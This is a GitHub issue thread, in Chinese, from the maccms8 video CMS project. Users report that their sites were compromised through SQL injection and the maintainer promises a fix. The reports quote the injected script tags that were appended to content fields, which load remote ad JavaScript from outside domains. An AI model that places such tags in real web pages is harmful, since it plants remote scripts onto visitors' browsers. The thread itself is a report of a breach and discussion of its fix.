### ISSUE TITLE
更新到最后，还是被挂马，d_name原名后面加了JS广告，

### ISSUE THREAD

**Issue by zhengnan06577** [magicblack/maccms8#12]
下午刚更新了20191008，晚上发现所有的 d_name原名后面加了JS广告
<script src=https://lefengtv.com/site.js></script><script src=https://lefengtv.com/site.js></script><script 

src=https://lefengtv.com/site.js></script><script src=https://lefengtv.com/site.js></script>

现在怎么处理

**Comment by wangbaoqiang-lixiaolu** [comment]
我也一样，清除挂马后、后台无法清除缓存

**Comment by magicblack** [comment]
已经确认问题所在，1010 彻底修复。

**Comment by zhengnan06577** [comment]
还是有广告，在HTML页中去了 {maccms:visits}标签广告就没有了，<script src="https://s1.safessd.com/filesa.min.js"></script> 
<script src="https://co.puretou.com/iquery.min.js"></script>
<script src="https://p0.66cn.com/t/24a1f2.js"></script>一大堆广告

**Comment by wangbaoqiang-lixiaolu** [comment]
感谢，我的问题已经解决，看看后面几天还会sql还会被注入么

**Comment by zhengnan06577** [comment]
你用手机版打开看看，全是弹窗


------------------&nbsp;原始邮件&nbsp;------------------
发件人:&nbsp;"wangbaoqiang-lixiaolu"<notifications@github.com&gt;;
发送时间:&nbsp;2020年1月1日(星期三) 晚上11:28
收件人:&nbsp;"magicblack/maccms8"<maccms8@noreply.github.com&gt;;
抄送:&nbsp;"無言以對"<zhengnan0657@qq.com&gt;;"Author"<author@noreply.github.com&gt;;
主题:&nbsp;Re: [magicblack/maccms8] 更新到最后，还是被挂马，d_name原名后面加了JS广告， (#12)




感谢，我的问题已经解决，看看后面几天还会sql还会被注入么
